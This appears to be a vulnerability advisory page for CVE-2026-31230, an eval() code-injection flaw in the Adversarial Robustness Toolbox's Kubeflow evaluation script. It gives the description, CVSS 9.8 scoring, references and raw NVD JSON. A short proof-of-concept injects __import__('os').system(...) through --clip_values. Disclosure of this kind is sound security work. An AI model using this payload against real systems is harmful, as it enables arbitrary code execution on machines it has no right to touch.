CVE-2026-31230

Description

The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a command-line argument injection vulnerability in its Kubeflow component (robustness_evaluation_fgsm_pytorch.py). The script uses the unsafe eval() function to parse string values provided via the --clip_values and --input_shape command-line arguments. This allows an attacker to inject arbitrary Python code into these arguments, which will be executed when eval() is called. The vulnerability can be exploited remotely if an attacker can control these arguments (e.g., through pipeline configuration or automated scripts), leading to arbitrary code execution on the system running the ART evaluation.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Adversarial Robustness Toolbox (ART) <= 1.20.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-31230
# Exploit usage of eval() on --clip_values or --input_shape

import subprocess

# Malicious payload to execute arbitrary Python code
# Example: spawning a shell or writing a file
payload = "__import__('os').system('touch /tmp/pwned')"

# Construct the command to run the vulnerable script
command = [
    'python',
    'robustness_evaluation_fgsm_pytorch.py',
    '--clip_values', f"({payload})", # Injecting code into the argument
    '--input_shape', '(1, 28, 28)'
]

# Execution leads to RCE
# subprocess.run(command)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31230
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31230
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31230/
[4] VulDB https://vuldb.com/cve/CVE-2026-31230
[5] https://github.com/Trusted-AI/adversarial-robustness-toolbox
[6] https://www.notion.so/CVE-2026-31230-35d1e13931888126b624d12769c0e040

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31230", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.277", "lastModified": "2026-05-13T16:16:39.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a command-line argument injection vulnerability in its Kubeflow component (robustness_evaluation_fgsm_pytorch.py). The script uses the unsafe eval() function to parse string values provided via the --clip_values and --input_shape command-line arguments. This allows an attacker to inject arbitrary Python code into these arguments, which will be executed when eval() is called. The vulnerability can be exploited remotely if an attacker can control these arguments (e.g., through pipeline configuration or automated scripts), leading to arbitrary code execution on the system running the ART evaluation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://github.com/Trusted-AI/adversarial-robustness-toolbox", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31230-35d1e13931888126b624d12769c0e040", "source": "[email protected]"}]}}